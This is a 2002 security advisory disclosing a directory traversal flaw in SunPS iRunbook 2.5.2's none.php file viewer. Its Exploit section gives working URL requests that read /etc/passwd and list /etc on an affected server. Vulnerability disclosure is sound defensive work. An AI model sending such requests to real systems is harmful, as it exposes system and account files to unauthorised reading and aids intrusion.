Portcullis Security Advisory Directory Traversal Vulnerability in SunPS iRunbook 2.5.2 Vulnerability discovery and development: John Clayton, Portcullis Security Testing Services Team Leader Affected system: SunPS iRunbook Version 2.5.2 complied by Mike Corlett - 15:00 - 8th January 2002 running on Apache 1.3.22 with PHP 4.0.6 - Kernel version: SunOS 5.8 Generic 108528-12 September 2001 System Type: SUNW,Sun-Blade-100 Details: The file none.php used in iRunbook Explorer to view files from the build snapshot can be manipulated to view any files or folders on the server providing the web server user has read access to the file and directory. It was initially achieved by studying the request strings in the links to view files in the build report and seeing that it makes requests for file paths with ":" of instead of the usual "/". Thus is was possible to use directory traversal to view any file or folder. Later it was discovered that the "..:..:" wasn't needed to traverse directories and the path to the file just needs to be entered in the web browser after the ?. Impact: Any user that can access the webserver can view files and directories on the system that are usually world readable such as /etc/ and /etc/passwd. Exploit: view passwd file - http://<Serverip:port>/content/base/build/explorer/none.php?..:..:..:..:..:. .:..:etc:passwd: or http://<Serverip:port>/content/base/build/explorer/none.php?/etc/passwd view contents of /etc directory - http://<Serverip:port>/content/base/build/explorer/none.php?..:..:..:..:..:. .:..:etc: or http://<Serverip:port>/content/base/build/explorer/none.php?/etc/ Copyright © Portcullis Computer Security Limited 2002, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. John Clayton Portcullis Computer Security Ltd. Security Testing Services Team Leader and Dragon IDS Technical Product Manager www.portcullis-security.com